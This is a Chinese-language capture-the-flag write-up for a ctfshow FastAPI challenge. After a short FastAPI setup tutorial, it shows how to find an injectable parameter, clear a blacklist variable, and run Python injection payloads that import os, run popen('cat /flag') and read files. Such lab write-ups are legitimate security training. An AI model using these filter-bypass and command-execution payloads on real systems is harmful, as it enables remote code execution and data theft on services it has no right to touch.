原谅5_fastapi2(fastapi)

文章目录

  • 了解fastapi
  • 题解

了解fastapi

fastapi的官方文档:https://fastapi.tiangolo.com/zh/

根据官方文档所说,fastapi是一个web框架,感觉和flask差不多

原谅5_fastapi2(fastapi)_第1张图片

然后下载fastapi试试:

pip install fastapi
pip install uvicorn

安装好之后把文档里的示例代码运行一下

main.py

原谅5_fastapi2(fastapi)_第2张图片
运行:

uvicorn main:app --reload

原谅5_fastapi2(fastapi)_第3张图片

原谅5_fastapi2(fastapi)_第4张图片
看到了和文档差不多的结果,然后访问http://127.0.0.1:8000/,可以发现环境已经搭建好了
原谅5_fastapi2(fastapi)_第5张图片

测试一下路由/items/{item_id},访问http://127.0.0.1:8000/items/5?q=somequery

@app.get("/items/{item_id}")
def read_item(item_id: int, q: str = None):
    return {
     "item_id": item_id, "q": q}

原谅5_fastapi2(fastapi)_第6张图片

item_id: int, q: str = None的作用是定义数据类型为int和str,并且给q赋初值None,不传q果然为空
原谅5_fastapi2(fastapi)_第7张图片
如果不赋初值的话则必须传q,否则会报错。

fastapi还有个交互式API,地址为/docs和/redoc,可以通过它来选择要调试的api,并传递参数给api实时查看结果,也就是说有了这个界面我们就知道参数有哪些,否则光一个api界面我们也不知道参数,因此这个功能只能用于调试。
原谅5_fastapi2(fastapi)_第8张图片

题解

进入题目是一个fastapi,然后访问/docs或/redoc访问交互式界面
原谅5_fastapi2(fastapi)_第9张图片

有三个路由,根据题目意思应该选择中间那个
原谅5_fastapi2(fastapi)_第10张图片

通过这个界面我们知道它需要传递一个参数q进去
原谅5_fastapi2(fastapi)_第11张图片

因为是基于python的,所以试试ssti,测试发现存在ssti
原谅5_fastapi2(fastapi)_第12张图片

然后注入,怎么注入都不行,后面的操作就有点看不懂了,看了题解才知道有过滤,先查看当前的全局变量

list(calc.__globals__)

原谅5_fastapi2(fastapi)_第13张图片

查看其中的 youdontknow

youdontknow

原谅5_fastapi2(fastapi)_第14张图片

好家伙,过滤了class,然后要用clear()把这个变量清空

youdontknow.clear()

原谅5_fastapi2(fastapi)_第15张图片

然后就是正常的ssti了

q=str([].__class__.__base__.__subclasses__()[189].__init__.__globals__['__builtins__']['__imp'+'ort__']("os").__dict__['pop'+'en']("cat /flag").read())

原谅5_fastapi2(fastapi)_第16张图片

还可以通过open函数直接读取

open("/flag").read()

原谅5_fastapi2(fastapi)_第17张图片

你可能感兴趣的:(#,ctfshow系列)